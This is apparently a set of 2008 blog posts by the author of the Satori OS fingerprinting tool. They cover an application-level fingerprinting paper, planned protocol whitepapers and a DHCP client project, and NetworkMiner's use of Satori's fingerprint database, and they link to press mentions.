A short (36 pages or so) powerpoint type paper on Application Level Fingerprinting.

I found it interesting how, depending on the OS the application was running on, it would act differently depending on what was sent at it. After doing some of this for going on 10 years, I'm surprised to find that I'm surprised by it, but I was.

Anyway, seems like a nice writeup on a new way of thinking/testing a few things. If I was still big into Active Fingerprinting I may have had to try to expand on this, but for now, I have enough projects.

Check it out. And if you don't like pdf's, check out the original post at SecurityFocus and grab one of the other formats. Otherwise click on the Title up top and you should hit the pdf version of it.

Future papers & projects

2008-11-02T18:26:00.003-07:00

After looking at what I had out there from my 2005 paper I realized there are a lot of things I've added to Satori that I really don't have documented well on how I did it. Since Satori and my papers are my way of giving back to the community, I'm going to try to go back and document each of the protocols I parse and use in Satori and do a quick whitepaper on each. Nothing like the DHCP one, since that was written specifically for Blackhat 2007, but enough to help others who are trying to duplicate what I've done.

Also, I've been thinking about writing my own DHCP client for Windows. It goes along with the idea irongeek worked on about changing your TCP stack. I have the initial plan in my head, but have not started coding it. Not sure it will ever come to completion, but will be fun to create a DHCP program to do DHCP Request, Inform, Discover, etc packets while looking like it is a Linux 2.2 box, or a Windows 95 box, etc. It will give me a chance to test some of the questions I had while writing the DHCP paper originally to see who well some DHCP servers adhere to things.

First things first though, 2 new certs to work on, hopefully coding or writing of the whitepapers will start by Dec 1, but who knows. Still need to get back to some Satori work one of these days!

Wikipedia post

2008-11-02T18:23:00.004-07:00

Ok, not sure who originally updated the OS Fingerprinting post on wikipedia and added Satori, but it wasn't me. Glad to see NetworkMiner and Satori were added!

Since it was already there, I flushed out the Passive Fingerprinting stuff a bit more, putting links to my 2 papers on OS fingerprinting in general and to DHCP fingerprinting. I know shameless, but figured if that stuff was going to be mentioned it might as well have some decent reference material!

Wikipedia post can be seen at:
http://en.wikipedia.org/wiki/OS_fingerprinting

Network Miner

2008-10-16T15:37:00.004-06:00

One program that is currently using parts of Satori is NetworkMiner, which is actually where most of the other news about Satori has been coming out from lately.

NetworkMiner uses the dhcp fingerprinting DB in the currently released version at:
http://sourceforge.net/projects/networkminer/

I believe the next version that is released should also have the tcp fingerprinting piece from Satori based on emails with the author in the past.

Some good articles on NetworkMiner and what all it can do can be found here:
http://holisticinfosec.org/toolsmith/docs/august2008.pdf
http://www.net-security.org/dl/insecure/INSECURE-Mag-18.pdf

The 2nd one you'll need to jump to page 18.

NetworkMiner is a very nice program to pull information off the network and rebuild the files that are being downloaded. Driftnet for windows along with a lot of other nice features. Its OS identification is not nearly as polished as Satori, in my opinion at least, but that is not what it is geared towards.

Check it out

Satori in the news "out there"

2008-10-16T15:10:00.003-06:00

The following sites/blogs have information on OS identification that mention Satori:
One of the first references to it that I recall was by Thierry Zoller in a post on full disclosure, then later on his blog

http://snoopsec.blogspot.com/2008/10/obfuscating-your-os-tcp-stack-or-way-to.html
http://www.binrev.com/forums/index.php?showtopic=39194&st=0&gopid=319785&#entry319785
http://www.irongeek.com/i.php?page=security/osfuscate-change-your-windows-os-tcp-ip-fingerprint-to-confuse-p0f-networkminer-ettercap-nmap-and-other-os-detection-tools
http://hackaday.com/2008/10/04/avoiding-os-fingerprinting-in-windows/

The hackaday post came out on Oct 4, 2008, the hits to my website jumped from roughly 100 hits a month, to about 350 in a 4-5 day period after that spot came out!